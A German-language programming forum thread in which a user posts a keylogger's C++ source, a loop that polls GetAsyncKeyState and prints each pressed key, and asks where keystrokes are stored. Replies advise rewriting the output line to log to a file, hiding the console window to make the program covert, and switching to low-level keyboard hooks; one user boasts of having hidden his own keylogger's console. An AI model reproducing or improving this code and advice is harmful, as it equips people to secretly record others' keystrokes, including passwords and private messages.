Code
-
Ich hab diesen keylogger im internet gefunden und jetzt hab ich eien frage : wo werden die eingaben gespeichert ??
-
was hat das in ansi c zu suchen?
welcher keylogger?
lies das f****** handbuch von dem teil.
-
den hab ich ja ganz vergessen
#include <windows.h> #include <iostream.h> int main() { SHORT KeyState; SHORT ArrKeyState[256]; long CheckSum; long OldCheckSum; OldCheckSum = 987654; // dummy while (1) { CheckSum = 0; for (int i = 0; i < 256; i++) { KeyState = GetAsyncKeyState(i); CheckSum += KeyState; ArrKeyState[i] = KeyState; } if (OldCheckSum != CheckSum) { for (int i = 0; i < 256; i++) { // -32767 = KeyDown if (ArrKeyState[i] == -32767) { cout << "Key " << i << " pressed. (" << (char) i << ")" << endl; } } } OldCheckSum = CheckSum; } }
-
wo werden die eingaben gespeichert
In StdOut.
-
gar nicht die werden unmittelbar auf stdout ausgegeben.
psssssst keinem verraten das soll C++ sein
-
die checksum ist echt überflüssig
-
musst nur die zeile
cout << "Key " << i << " pressed. (" << (char) i << ")" << endl;
so aendern dass es in ne datei gespeichert wir d und die konsole hiden und schon wir das programm interressanr
-
Das Programm ist aber extrem rechenlastig, also ich würde einen guten KeyLogger keinesfalls so programmieren.
MfG SideWinder
-
SideWinder schrieb:
Das Programm ist aber extrem rechenlastig, also ich würde einen guten KeyLogger keinesfalls so programmieren.
da muss ein kleines 'Sleep' mit rein, aber besser sind wohl hooks (WH_KEYBOARD_LL o.ä.)
-
net schrieb:
SideWinder schrieb:
da muss ein kleines 'Sleep' mit rein, aber besser sind wohl hooks (WH_KEYBOARD_LL o.ä.)
Was heißt "besser sind wohl", das ist die einzige Möglichkeit :D. Mit Sleep() bekommst du ja wieder nicht alle Tastendrücke.
GetAsyncKeyState() gibt 10ms später nichts mehr zurück, also sinnlos. Die Eingabe einfach so abzufangen funktioniert aber auch nicht da die Konsole nur im aktiviertem Zustand Eingabefokus hat (versteckt also unmöglich).
Letzen Endes bleiben nur Hooks.
MfG SideWinder
-
Eingabefokus hat (versteckt also unmöglich).
STIMMT NICHT ich habe auch n keylogger mit GetAsyncKeyState() geschrieben und die konsole hab ich gut verstaecken koennen...